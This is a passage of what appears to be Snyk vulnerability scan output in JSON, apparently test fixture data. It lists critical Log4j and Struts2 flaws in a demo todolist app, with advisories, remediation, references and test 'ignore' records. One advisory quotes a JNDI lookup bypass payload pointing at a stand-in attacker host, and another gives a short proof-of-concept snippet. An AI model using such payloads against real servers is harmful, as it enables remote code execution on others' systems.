For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + "functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T13:04:24.344Z", + "expires": "2024-08-08T13:04:24.004Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:46.732Z", + "expires": "2024-08-08T12:48:46.464Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Marcio Almeida de Macedo" + ], + "semver": { + "vulnerable": [ + "[,2.8.2)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.8.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", + "className": "TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://github.com/pimps/CVE-2017-5645", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", + "title": "Jira Issue" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", + "title": "NVD" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:08.335550Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", + "epssDetails": { + "percentile": "0.98601", + "probability": "0.87384", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5645" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fxph-q3j8-mv87" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2017-05-17T12:10:22.545000Z", + "functions_new": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-01T21:00:00Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2017-05-21T07:52:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:27.233939Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.8.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:54.986Z", + "expires": "2024-08-08T12:48:54.807Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Alvaro Munoz", + "Masato Anzai" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.26)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.26" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/phil-fly/CVE-2020-17530", + "title": "PoC" + }, + { + "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", + "title": "PoC" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:56.396718Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", + "epssDetails": { + "percentile": "0.99845", + "probability": "0.97257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-17530" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-12-08T19:30:16.810323Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-12-08T19:25:45Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-12-08T19:25:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.269995Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.26" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:40.620Z", + "expires": "2024-08-08T12:48:40.431Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Nike Zheng" + ], + "semver": { + "vulnerable": [ + "[2.3.7, 2.3.32)", + "[2.5.0, 2.5.10.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.32", + "2.5.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + "functionId": { + "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", + "className": "JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", + "className": "FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", + "title": "CVE Details" + }, + { + "url": "https://exploit-db.com/exploits/41614", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/41570/", + "title": "Exploit DB" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/issues/8064", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072", + "title": "GitHub PR" + }, + { + "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", + "title": "Struts Wiki" + }, + { + "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", + "title": "Talos Intelligence Blog" + }, + { + "url": "https://www.exploit-db.com/exploits/41570", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:03.020507Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", + "epssDetails": { + "percentile": "0.99996", + "probability": "0.97546", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5638" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-j77q-2qqg-6989" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-03-19T10:28:21.873000Z", + "functions_new": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + "functionId": { + "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "className": "org.apache.struts2.interceptor.FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-03-05T22:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-03-21T15:30:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.313495Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:35.155Z", + "expires": 